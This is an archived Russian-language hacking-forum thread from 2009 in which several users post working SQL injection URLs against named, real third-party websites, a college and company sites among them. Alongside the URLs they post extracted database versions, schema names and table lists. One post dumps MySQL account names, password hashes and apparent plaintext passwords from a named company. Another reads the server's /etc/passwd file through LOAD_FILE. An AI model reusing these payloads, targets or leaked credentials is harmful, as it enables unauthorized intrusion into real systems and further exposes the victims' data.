ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9231  
Старый 07.05.2009, 00:28
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://aviagit.am/hotels.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(), user()),7--


5.0.67-community-log:aviagit_aviagit:aviagit_aviagit@localhost

http://aviagit.am/hotels.php?id=-1+union+select+1,2,3,4,5,group_concat(table_name), 7+from+information_schema.tables+group+by+tab le_schema+lim it+0,1--

Таблы:
template1,top_images,hotels
 
Ответить с цитированием

  #9232  
Старый 07.05.2009, 01:57
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию

скуль:

Код:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,2,3,4,5,6,7--
версия:

Код:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,version(),3,4,5,6,7--
5.0.68-log

таблицы выводятся:

Код:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--
столбцы выводятся:

Код:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns--
infa:

Код:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7--
user() Sql138934@62.149.141.80
database() Sql138934_1
 
Ответить с цитированием

  #9233  
Старый 07.05.2009, 02:18
Lam3rsha
Новичок
Регистрация: 25.10.2008
Сообщений: 10
Провел на форуме:
502317

Репутация: 18
По умолчанию

http://www.mariatk.ru/catalog.htm?cat_id=30+union+select+user(),2/*

Database Version: 4.0.27
Database name: mariya
User name: root@pm3.zenon.net
 
Ответить с цитированием

  #9234  
Старый 07.05.2009, 06:28
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.tsarichanska.com/page.php?pn=-99999999999%20union%20select%20table_name%20%20fro m%20information_schema.tables%20limit%2019,1--

5.0.67 log
 
Ответить с цитированием

  #9235  
Старый 07.05.2009, 11:52
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.navarrocollege.edu/former.php?id=-159'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14+--+
4.1.20
 
Ответить с цитированием

  #9236  
Старый 07.05.2009, 13:16
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 3

http://www.radhaus-am-rathaus.de/index.php?page=partner&id=1+union+select+1,concat_ ws(0x3a,version(),datab ase(),u ser()),3,4,5,6,7,8,9--

5.0.45:radhaus_08:rad_user@localhost

таблы:
download
download_download
download_kategorien
galerie
index_banner_1
link_kategorien
link_links
mitarbeiter_standard
news
pages
pages_txt
simple
simple_txt
standards
standards_entries
su
su_navi
verein_sponsor

------------------------------------------------------------------------
http://am-galerie.de/home.php?id=1&content_id=-12+union+sel ect+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6--&color=CAE29B


5.0.24-Debian_0.dotdeb.0-log:de9414:de9414@localhost

http://am-galerie.de/home.php?id=1&content_id=-12+union+select+1,2,group_concat(table_name),4,5,6 +fr om+infor mation_schema.tables+group+by+table_schema--&color=CAE29B

таблы:
artists,content,images,menus
------------------------------------------------------------------------
PR: 4

http://www.apo-klein-am-markt.de/index.php?c=1&id=-1+union+select+1,concat_ws(0x3a,vers ion(),database(),u ser())--

(вывод смареть в html коде)

4.0.27-logB105344:U105344@cohen.store

Последний раз редактировалось HAXTA4OK; 07.05.2009 в 13:56..
 
Ответить с цитированием

  #9237  
Старый 07.05.2009, 14:05
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 4

http://www.nakoil.am/Groups.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),data base(), user()),3--

5.0.67-community-log:nakoil_DB:nakoil_ash@localhost
 
Ответить с цитированием

  #9238  
Старый 07.05.2009, 15:12
tymbys
Новичок
Регистрация: 19.11.2008
Сообщений: 2
Провел на форуме:
56479

Репутация: 7
По умолчанию

http://www.patagoniaexpeditionrace.com/en/news_detail.php?news=-1+UNION+SELECT+1,2,3,4,5,concat(user(),0x3a,versio n(),database()),7,8,9,10,11,12,13
http://www.patagoniaexpeditionrace.com/en/news_detail.php?news=-1+UNION+SELECT+1,2,3,4,5,LOAD_FILE(0x2F6574632F706 173737764),7,8,9,10,11,12,13

sitio@cgi1101.int.bizland.net:5.0.45-logsitio
 
Ответить с цитированием

  #9239  
Старый 07.05.2009, 16:43
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.garradhassan.com Page Rank 6
Код:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7--
version() - 5.0.51b-community-nt
database() - ghcom
user() - root@localhost

tables:
Код:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,group_concat(table_name),7+from+information_schema.tables--
Код:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_schema,table_name),7+from+information_schema.tables+where+table_name=0x75736572--
mysql.user:
Код:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,password),7+from+mysql.user--
root:373ba1c07f888b3b:3y35alphA
helpdesk:*246AAAE25BC090A8A06E3211EAD3827FA6A8819A :spooky
web:*B55160D1065FEAB0F8EEA92C8AD493C8DCCA537B:хз

--------------------------------------------------------------------------------

http://dtincr.ph PR 5
Код:
http://dtincr.ph/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())--
5.0.67-community:dtincr_db:dtincr_dtincr@localhost

Последний раз редактировалось Skofield; 07.05.2009 в 17:53..
 
Ответить с цитированием

  #9240  
Старый 07.05.2009, 18:02
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию

скуль:
Код:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
версия:
Код:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16--
5.0.27
таблицы выводятся limit'om:
Код:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
столбцы выводятся limit'om:
Код:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns--
infa:

Код:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database()),7,8,9,10,11,12,13,14,15,16--
user() aprile_info@localhost
database() aprileonline_info

Последний раз редактировалось _SEREGA_; 07.05.2009 в 18:19..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ